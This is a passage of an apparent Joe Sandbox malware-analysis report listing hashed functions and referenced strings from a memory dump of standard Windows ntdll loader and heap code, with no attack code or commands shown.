                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                  • API String ID: 0-1334570610
                                                                  • Opcode ID: 67d2e7e9cd6202c91c8c7814821f5f868881fecb0978382811ccc7c49038fba4
                                                                  • Instruction ID: cd9f2aa3dd9c657088b2730e7ca8d7049ebcae7aba3dc7115ae4761f0d34445b
                                                                  • Opcode Fuzzy Hash: 67d2e7e9cd6202c91c8c7814821f5f868881fecb0978382811ccc7c49038fba4
                                                                  • Instruction Fuzzy Hash: EC61AF716143029FDB29CF68C480BABBBF1FF54705F14855AE8598F2A2D770E881CBA1
                                                                  Function 014DC720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 015182E8
                                                                  • Failed to reallocate the system dirs string !, xrefs: 015182D7
                                                                  • LdrpInitializePerUserWindowsDirectory, xrefs: 015182DE
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 0-1783798831
                                                                  • Opcode ID: bec7737be25c003d997bac98da1f5e73459869964a3621b74689553330cd6107
                                                                  • Instruction ID: b765fdcda846698d722dc4ae36844128dc9b121facd579c81369ab21702beaa5
                                                                  • Opcode Fuzzy Hash: bec7737be25c003d997bac98da1f5e73459869964a3621b74689553330cd6107
                                                                  • Instruction Fuzzy Hash: A641F3B1540302ABDB31EB69D884F9B77E8BF58650F06482FF9549B2A4E770D804CB92
                                                                  Function 0155C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0155C1C5
                                                                  • PreferredUILanguages, xrefs: 0155C212
                                                                  • @, xrefs: 0155C1F1
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                  • API String ID: 0-2968386058
                                                                  • Opcode ID: c51ca750496cb680389543e0ee9892e06af0ebcc5f586e93e3c5e2062e92c1b4
                                                                  • Instruction ID: 96d1707c5ada8ed86c07b50bec7bb14fb41ca7a55402e332e5ea10814788dbb3
                                                                  • Opcode Fuzzy Hash: c51ca750496cb680389543e0ee9892e06af0ebcc5f586e93e3c5e2062e92c1b4
                                                                  • Instruction Fuzzy Hash: 0B418071E00209ABDF51DED9C891BEEBBBCBB24744F14406BEA49BB250D7749A448B90
                                                                  Function 01534144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                  • API String ID: 0-1373925480
                                                                  • Opcode ID: 1954b68c671dd3e4d2a1a8c646823909ccec4a79cb2d6be004107cb384dc86a2
                                                                  • Instruction ID: 00b9573fabda9cad246ead555d2764ea0899af028780a41a2645d2efec087e5a
                                                                  • Opcode Fuzzy Hash: 1954b68c671dd3e4d2a1a8c646823909ccec4a79cb2d6be004107cb384dc86a2
                                                                  • Instruction Fuzzy Hash: 1C41D232A006598BEB25DF9AC844BADBBF8FFA5340F14085AE901FF791D7748901CB60
                                                                  Function 01524755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01524888
                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 01524899
                                                                  • LdrpCheckRedirection, xrefs: 0152488F
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                  • API String ID: 0-3154609507
                                                                  • Opcode ID: a0464f78adfc087929363bd4354ac45333bfa29a2d7017c24284f8d0d71d5137
                                                                  • Instruction ID: 6a869259a05dc1b62e04aacb8d5a8eeb98cfb14146c51e86eb127297e76d3b90
                                                                  • Opcode Fuzzy Hash: a0464f78adfc087929363bd4354ac45333bfa29a2d7017c24284f8d0d71d5137
                                                                  • Instruction Fuzzy Hash: 8741A133A146719FCB21CF68D840A6A7BE4BF8AA50F0A056DED68DF391D770D801CB91
                                                                  Function 014B0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                  • API String ID: 0-2558761708
                                                                  • Opcode ID: 182b2016ba6e1d331bb8b1395a6692a41267470f5cb4571794b0ed76c61e9c7a
                                                                  • Instruction ID: 88f46abb39f641ea9a068514d303cd18aba8eacd51ce04aee8887ddef4623fd7
                                                                  • Opcode Fuzzy Hash: 182b2016ba6e1d331bb8b1395a6692a41267470f5cb4571794b0ed76c61e9c7a
                                                                  • Instruction Fuzzy Hash: BF11C3313281029FDB2ACB59C484BBAB7A4FF40616F1A855EF4058F2A1E730D845CB61
                                                                  Function 015220DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 01522104
                                                                  • Process initialization failed with status 0x%08lx, xrefs: 015220F3
                                                                  • LdrpInitializationFailure, xrefs: 015220FA
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 0-2986994758
                                                                  • Opcode ID: fdf613027d5fa5f3a1ccc151e8aae1c8fcba3d86fd17afcdd5daba81d79967e2
                                                                  • Instruction ID: 97e750b177d2e8799a65639319658a29c720d7f1f71996b8d7b3022f17c10214
                                                                  • Opcode Fuzzy Hash: fdf613027d5fa5f3a1ccc151e8aae1c8fcba3d86fd17afcdd5daba81d79967e2
                                                                  • Instruction Fuzzy Hash: C8F0C27A640319ABEB24EB4DCC46F9D3768FB41B54F22005EFA006F2D5D2F0AA04DA91
                                                                  Function 014B03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID: ___swprintf_l
                                                                  • String ID: #%u
                                                                  • API String ID: 48624451-232158463
                                                                  • Opcode ID: 2006938eac39fc0e365da6021b400c740527b589acd66fe763e21343537b4c37
                                                                  • Instruction ID: afc14597d9013e12a7f7448f087bbc8109b6a1e40edac04edfa724d008ea2965
                                                                  • Opcode Fuzzy Hash: 2006938eac39fc0e365da6021b400c740527b589acd66fe763e21343537b4c37
                                                                  • Instruction Fuzzy Hash: 21713F71A0014A9FDB01DF99C994FAEB7F8BF58704F15406AE905EB2A1EA34ED01CB61
                                                                  Function 014AA9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • LdrResSearchResource Exit, xrefs: 014AAA25
                                                                  • LdrResSearchResource Enter, xrefs: 014AAA13
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                  • API String ID: 0-4066393604
                                                                  • Opcode ID: b18f3fa1d20f27bebeba18ae3954eac173f2e85b9ae9681918e3bd4e8e77bef4
                                                                  • Instruction ID: 83f8022c54c7c56d5ddfaf4ff92edee1d534f5396c06dc08f50a7be06b8f1a4e
                                                                  • Opcode Fuzzy Hash: b18f3fa1d20f27bebeba18ae3954eac173f2e85b9ae9681918e3bd4e8e77bef4
                                                                  • Instruction Fuzzy Hash: A0E1A571E002159FEF22CFD9C954BAEBBB9BF68310F61042BE911EB2A1D7349941CB50
                                                                  Function 0156A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: `$`
                                                                  • API String ID: 0-197956300
                                                                  • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                  • Instruction ID: 362e78da5dc6782e75a90b3c6e6713deae9650cfee0dc1b1d6d7f137d36b6cbf
                                                                  • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                  • Instruction Fuzzy Hash: 06C1C1312043429BEB25CF28C841B6BBBE9BFD4318F184A2DF6969F290D774D905CB91
                                                                  Function 0151E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID: Legacy$UEFI
                                                                  • API String ID: 2994545307-634100481
                                                                  • Opcode ID: c0147b43eb631491488c7556e6109ec68076fdcafd5a398e0f2cfd8e5e6cd3fc
                                                                  • Instruction ID: 8c07884630426843461a2f80fd7cbff2faa3ba622b49876f9e1c9732e32fe3e1
                                                                  • Opcode Fuzzy Hash: c0147b43eb631491488c7556e6109ec68076fdcafd5a398e0f2cfd8e5e6cd3fc
                                                                  • Instruction Fuzzy Hash: 37615F71E00309AFEB16DFA9C841BADBBF5FB58700F14446EEA49EB295D731A940CB50
                                                                  Function 015443D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @$MUI
                                                                  • API String ID: 0-17815947
                                                                  • Opcode ID: e4a159a7873df207a503c37cba1af2897286548aaf8aca75299255e781b8f313
                                                                  • Instruction ID: 9f1566fee62f32b14bbc3a5f0ec24b0d1e6df7bbbeef72ea9d898258255c0f95
                                                                  • Opcode Fuzzy Hash: e4a159a7873df207a503c37cba1af2897286548aaf8aca75299255e781b8f313
                                                                  • Instruction Fuzzy Hash: D2512871D4021DAFDF11DFA9CC84FEEBBBCBB54658F10052AE615BB290D6709A058BA0
                                                                  Function 014A04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 014A063D
                                                                  • kLsE, xrefs: 014A0540
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                  • API String ID: 0-2547482624
                                                                  • Opcode ID: 43b3019802395ac8f58d3950e48e8dc6c77e821f566b8f68dec6bd9410688b69
                                                                  • Instruction ID: 01e4e7eb6b17d001bb12ecfbe67605e21cc50c253525eaa76a43f23877b21239
                                                                  • Opcode Fuzzy Hash: 43b3019802395ac8f58d3950e48e8dc6c77e821f566b8f68dec6bd9410688b69
                                                                  • Instruction Fuzzy Hash: 0551BE715047428BD724EF69C4406A7BBE4AFA4304F52483FF6EA87361E770E549CB92
                                                                  Function 014AA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • RtlpResUltimateFallbackInfo Exit, xrefs: 014AA309
                                                                  • RtlpResUltimateFallbackInfo Enter, xrefs: 014AA2FB
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                  • API String ID: 0-2876891731
                                                                  • Opcode ID: e1a8c3a807b97dd7dab5159d215fb6461f92a9e0889e9b99c4b531697baf87a5
                                                                  • Instruction ID: 5308aef21d46512a9922ac925e6ff9fe876f78be6c04d0f2adedaa52c396a0c9
                                                                  • Opcode Fuzzy Hash: e1a8c3a807b97dd7dab5159d215fb6461f92a9e0889e9b99c4b531697baf87a5
                                                                  • Instruction Fuzzy Hash: 6E41D131A00655DBEB12CF99C844BAE7BB4FFA5300F6540AAE900DF3A1E3B5D941CB50
                                                                  Function 014DA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID: Cleanup Group$Threadpool!
                                                                  • API String ID: 2994545307-4008356553
                                                                  • Opcode ID: 88bc82ded9fbc948470fa921c90b21a3f301935afa2c04c3510ea2ef6385c006
                                                                  • Instruction ID: 7f673eb34ef30477ee0e50e0663fe0135920abb232abbcec13d17e37f6a33cee
                                                                  • Opcode Fuzzy Hash: 88bc82ded9fbc948470fa921c90b21a3f301935afa2c04c3510ea2ef6385c006
                                                                  • Instruction Fuzzy Hash: F401D1B2244704EFE311DF14CE45F2677E8E794715F05893AA69CCB1A0E3B4D808CB46
                                                                  Function 014AC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: MUI
                                                                  • API String ID: 0-1339004836
                                                                  • Opcode ID: bd7de83a0307a20a71dc78b094269711114fad53cf7883d5b383e204595d7cb8
                                                                  • Instruction ID: 1f5e06adcbb6258d44af1cc35f5acb62352c02d5b0e56911ff7729c3a5d251f5
                                                                  • Opcode Fuzzy Hash: bd7de83a0307a20a71dc78b094269711114fad53cf7883d5b383e204595d7cb8
                                                                  • Instruction Fuzzy Hash: AF827075E002189FEB64CFA9C8807EEBBB5BF68310F55816AD919AB7A0D7309D41CF50
                                                                  Function 01526420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID: 0-3916222277
                                                                  • Opcode ID: 17aa09b2223d61f61d1e4d95dc2621fbc6d2c7e20b3c5d7f6ee1dacbd8dbcb2c
                                                                  • Instruction ID: 4c876a7bb3c4c6d1c1a10d1f04c107a6ef7631bf051ab7a4ae866c88817080e5
                                                                  • Opcode Fuzzy Hash: 17aa09b2223d61f61d1e4d95dc2621fbc6d2c7e20b3c5d7f6ee1dacbd8dbcb2c
                                                                  • Instruction Fuzzy Hash: DB915472A01229AFDB21DF95CD85FAE7BB8FF15B50F104059F600AB1E0D675AD04CB60
                                                                  Function 0154E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID: 0-3916222277
                                                                  • Opcode ID: 4562cb5e88536d4afb62454038f53fb3557df94230b10b016ba8748fe4fc7124
                                                                  • Instruction ID: 9504f8ea14079cf277b1800550fd33fb9e5d5539355077cef9bf8c7660b1c420
                                                                  • Opcode Fuzzy Hash: 4562cb5e88536d4afb62454038f53fb3557df94230b10b016ba8748fe4fc7124
                                                                  • Instruction Fuzzy Hash: 8D918032900605BBDB229FA6DC85FEFBBB9FF55754F14002AF505AB260D778A901CB50
                                                                  Function 014DA660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: GlobalTags
                                                                  • API String ID: 0-1106856819
                                                                  • Opcode ID: 31741a644143d5ab54594885901e01ed437a4abb39cd2a69f83cd360b51267a9
                                                                  • Instruction ID: 8427edf1898d2354b4a896fa67db373dd0fcc3ab1aaede5ba674b83e480899aa
                                                                  • Opcode Fuzzy Hash: 31741a644143d5ab54594885901e01ed437a4abb39cd2a69f83cd360b51267a9
                                                                  • Instruction Fuzzy Hash: 55719275E0020ADFEF2ACF9DD490AADBBF1BF58710F14852EE905AB254E7709841CB50
                                                                  Function 01544978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: .mui
                                                                  • API String ID: 0-1199573805
                                                                  • Opcode ID: f192e8700cf1e745c2b3061d6a7a72c4cd27845a8fbcb0815baa8a1b5c39b4eb
                                                                  • Instruction ID: ab664b5e46c83110f6eb9b040e07a0b06ea38c3bb4745fb5a4f92ecba041ff33
                                                                  • Opcode Fuzzy Hash: f192e8700cf1e745c2b3061d6a7a72c4cd27845a8fbcb0815baa8a1b5c39b4eb
                                                                  • Instruction Fuzzy Hash: 5C519272D4022A9BDF10DF9AD840BAEBBB5BF14A58F05412EEA11BF250D7749C01CBE4
                                                                  Function 014BE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: EXT-
                                                                  • API String ID: 0-1948896318
                                                                  • Opcode ID: 162adb6423bc9e083e352c21f08eec73ee127d02a77faea1fa51dc3e3e17251d
                                                                  • Instruction ID: 2274e75dc1cae08b85f24c095b850712ee7879eee7d9d0775906fd714db075e8
                                                                  • Opcode Fuzzy Hash: 162adb6423bc9e083e352c21f08eec73ee127d02a77faea1fa51dc3e3e17251d
                                                                  • Instruction Fuzzy Hash: A34192725083429BD711DA7AC880BEBB7E8AFD8614F44092FF684E7260E674D90587A2
                                                                  Function 0151C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: BinaryHash
                                                                  • API String ID: 0-2202222882
                                                                  • Opcode ID: e7ab3d01322e0afd162735219ec60dda4565012ebdb78a4c84356b8fd1183ec3
                                                                  • Instruction ID: 40bbbf884657bbf761756cff339c687c5723059c8d89950dd0f66fba09b1c022
                                                                  • Opcode Fuzzy Hash: e7ab3d01322e0afd162735219ec60dda4565012ebdb78a4c84356b8fd1183ec3
                                                                  • Instruction Fuzzy Hash: C74144F1D4012DAAEF21DA50CC84FDEB77CBB54714F0045AAEA08AB154DB719E498FA4
                                                                  Function 01536B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: #
                                                                  • API String ID: 0-1885708031
                                                                  • Opcode ID: 13bff653ee37cd46fa9fac4942015afa5fa9c6341d3fa1eab61ec321bf964b4d
                                                                  • Instruction ID: ff5f152e55dccb5369e9c98f2b5ac3a272519eb13fbaec186ce9511fb49b698e
                                                                  • Opcode Fuzzy Hash: 13bff653ee37cd46fa9fac4942015afa5fa9c6341d3fa1eab61ec321bf964b4d
                                                                  • Instruction Fuzzy Hash: 29311831A0070DABEB22CB6AC854BEE7BB8EF94704F14402DE940AF292D775DA05CB50
                                                                  Function 0151CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: BinaryName
                                                                  • API String ID: 0-215506332
                                                                  • Opcode ID: b16062512b248dd6d785aa8652a0ac85ad3b493ed4740d70a63b5827372c6075
                                                                  • Instruction ID: 8b60d5088ba360c7d23aea27030cce357e1ae4f796ba1019fa1aa91337e926d7
                                                                  • Opcode Fuzzy Hash: b16062512b248dd6d785aa8652a0ac85ad3b493ed4740d70a63b5827372c6075
                                                                  • Instruction Fuzzy Hash: 95310336A40519AFFB17DB59C845E6FBBB4FB80720F01416AA901EB250D771AE00DBE0
                                                                  Function 0152892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0152895E
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                  • API String ID: 0-702105204
                                                                  • Opcode ID: 3fe7d1efd75515bef6727ae53f8bd7e8c6f72c92c5e5f937979b2c5858e47e7a
                                                                  • Instruction ID: 2508dc65883dd6b7fe3a19415a45d0119e91bd97ec25efa732ef422eee29e64d
                                                                  • Opcode Fuzzy Hash: 3fe7d1efd75515bef6727ae53f8bd7e8c6f72c92c5e5f937979b2c5858e47e7a
                                                                  • Instruction Fuzzy Hash: 0901F7333102329BEF266F9A9884B6E7BE5FF93654F05045EF6411E5A1CB207854C793
                                                                  Function 01542000 Relevance: .8, Instructions: 757COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b71daa3c5ada4ff0a8dec278a3a0e71fb7b1415b430ff73687374c48c401357f
                                                                  • Instruction ID: 71a2ec5e043e23b49e2724376a0fbb0a8913fdb809f890a93b32ad35ffad1e3e
                                                                  • Opcode Fuzzy Hash: b71daa3c5ada4ff0a8dec278a3a0e71fb7b1415b430ff73687374c48c401357f
                                                                  • Instruction Fuzzy Hash: 3342E5366083518FE725CF69D890A6FBBE5FF98308F08492DFA869B250D770D845CB52
                                                                  Function 01538158 Relevance: .6, Instructions: 617COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 46a33fe37910f1223037e5431d5afc9d9abed0b26e84c7b761afd0f84f4e2b7f
                                                                  • Instruction ID: bf4d63ef4b6b072fd61f600b48272193092b25bf10191687c88067ff1f0581f4
                                                                  • Opcode Fuzzy Hash: 46a33fe37910f1223037e5431d5afc9d9abed0b26e84c7b761afd0f84f4e2b7f
                                                                  • Instruction Fuzzy Hash: 64426075E002198FEB25CF69C881BADBBF5BF94300F14819EE949EB251D7349985CF50
                                                                  Function 014B2840 Relevance: .6, Instructions: 605COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
